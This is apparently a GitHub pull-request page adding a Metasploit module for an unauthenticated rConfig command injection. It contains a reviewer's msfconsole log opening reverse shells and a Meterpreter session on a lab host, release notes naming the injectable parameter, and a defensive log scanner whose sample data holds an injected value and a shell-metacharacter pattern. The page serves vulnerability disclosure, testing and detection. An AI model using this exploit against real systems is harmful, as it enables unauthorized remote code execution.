
Add rConfig install Command Execution exploit #12507

Merged
merged 3 commits into from Nov 6, 2019

Conversation


bcoles commented Oct 29, 2019

Add rConfig install Command Execution exploit.

    This module exploits an unauthenticated command injection vulnerability
    in rConfig versions 3.9.2 and prior. The `install` directory is not
    automatically removed after installation, allowing unauthenticated users
    to execute arbitrary commands via the `ajaxServerSettingsChk.php` file
    as the web server user.

    This module has been tested successfully on rConfig version 3.9.2 on
    CentOS 7.7.1908 (x64).

It's worth noting that the installer warns the user to remove the install directory at the end of the installation process, and upon successful login.

[screenshot: rconfig-install-warning]

[screenshot: rconfig-login-warning]

@space-r7 space-r7 self-assigned this Nov 6, 2019

space-r7 commented Nov 6, 2019

Already had a CentOS box ready to go, so I went ahead and installed rConfig. Code looks good to me!

Testing rConfig v3.9.2 on CentOS 7:

```
AUS-MBP-3832:metasploit-framework space$ ./msfconsole -q
msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.215.159
rhosts => 172.16.215.159
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP double handler on 172.16.215.1:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo M0xYzCR3y2NCKx2x;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Command: echo Gy12m6m3pec8mdNj;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "M0xYzCR3y2NCKx2x\r\n"
[*] Matching...
[*] A is input...
[*] Reading from socket B
[*] B: "Gy12m6m3pec8mdNj\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.215.1:4444 -> 172.16.215.159:43540) at 2019-11-06 13:26:46 -0600
[*] Command shell session 2 opened (172.16.215.1:4444 -> 172.16.215.159:43536) at 2019-11-06 13:26:46 -0600

id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
""

[*] 172.16.215.159 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 1
target => 1
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.215.1:4444
[*] Sending stage (985320 bytes) to 172.16.215.159
[*] Meterpreter session 3 opened (172.16.215.1:4444 -> 172.16.215.159:43544) at 2019-11-06 13:27:10 -0600
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > getuid
Server username: uid=48, gid=48, euid=48, egid=48
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.4.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```
space-r7 added a commit that referenced this pull request Nov 6, 2019
@space-r7 space-r7 merged commit 08d51ac into rapid7:master Nov 6, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Nov 6, 2019

space-r7 commented Nov 6, 2019

Release Notes

This exploits a command injection vulnerability in rConfig versions v3.9.2 and below. Remote code execution can be gained by leveraging a file that's left on the system post installation of rConfig. The ajaxServerSettingsChk.php file uses the unsanitized $rootUname variable later in a call to exec(), which enables execution of malicious code passed through the variable.
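The PR description and the release notes above give a defender two concrete things to look for: the `install` directory still being served after setup, and requests to `ajaxServerSettingsChk.php` whose `rootUname` value carries shell metacharacters on the way to `exec()`. The following is an added example of detection logic over web-server access logs; it is not part of this PR, the Metasploit module, or the rConfig code base. The log lines are constructed sample data, the path layout beneath `install/` is assumed, and the `rootUname` query-parameter name is taken from the variable named in the release notes.

```ruby
require 'cgi'
require 'uri'

# Constructed Apache "combined" access-log lines (sample data, not real traffic).
# The directory layout beneath install/ is assumed; only the directory name and
# the ajaxServerSettingsChk.php filename come from the PR text.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [06/Nov/2019:13:26:40 -0600] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  10.0.0.5 - - [06/Nov/2019:13:26:42 -0600] "GET /install/index.php HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
  10.0.0.5 - - [06/Nov/2019:13:26:44 -0600] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=root HTTP/1.1" 200 412 "-" "Mozilla/5.0"
  10.0.0.7 - - [06/Nov/2019:13:26:45 -0600] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=root%3Bid HTTP/1.1" 200 412 "-" "curl/7.64.1"
  10.0.0.9 - - [06/Nov/2019:13:27:01 -0600] "GET /install/index.php HTTP/1.1" 404 196 "-" "curl/7.64.1"
LOG

# Apache combined format: client ident user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) \S+/

# A path component named exactly "install" (so /installer/ does not match).
INSTALL_DIR = %r{(\A|/)install(/|\z)}

# Characters that let a value handed to exec() start a second shell command.
# A username never legitimately contains any of them.
SHELL_META = /[;|&`\n\r]|\$\(/

# Parse one log line into a hash, or nil if it is not in the expected format.
def parse_line(line)
  m = LOG_LINE.match(line)
  return nil unless m
  begin
    uri = URI.parse(m[:target])
  rescue URI::InvalidURIError
    return nil
  end
  params = uri.query ? CGI.parse(uri.query) : {}
  { ip: m[:ip], time: m[:time], path: uri.path, params: params, status: m[:status].to_i }
end

# What a request under install/ means for the defender:
#   :install_dir_probe_failed  - install/ is gone (4xx), but someone still looked for it
#   :install_dir_reachable     - install/ is still being served after installation
#   :settings_check_reached    - the exec()-backed handler was hit with a plain value
#   :command_injection_attempt - rootUname carried shell metacharacters
def classify(entry)
  return nil unless entry[:path].match?(INSTALL_DIR)
  return :install_dir_probe_failed if entry[:status] >= 400
  if File.basename(entry[:path]) == 'ajaxServerSettingsChk.php'
    values = entry[:params].fetch('rootUname', [])
    return :command_injection_attempt if values.any? { |v| v.match?(SHELL_META) }
    return :settings_check_reached
  end
  :install_dir_reachable
end

# Run the classifier over a log blob; returns only the entries worth alerting on,
# in log order, each with its verdict attached.
def scan(log_text)
  log_text.each_line.each_with_object([]) do |line, findings|
    entry = parse_line(line.chomp)
    next unless entry
    verdict = classify(entry)
    next unless verdict
    findings << entry.merge(verdict: verdict)
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each do |f|
    puts format('%-27s %-10s %s %s', f[:verdict], f[:ip], f[:path], f[:params].inspect)
  end
end
```

A single `:install_dir_reachable` hit after go-live is the actionable finding: it means the warning shown by the installer and on login was not acted on, and the directory should be removed (or denied at the web server) before anything else is investigated. The 4xx branch is there so that the same probes against a host that has already removed `install/` are recorded as failed reconnaissance rather than raising the same alert.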

@bcoles bcoles deleted the bcoles:rconfig_install_cmd_exec branch Nov 6, 2019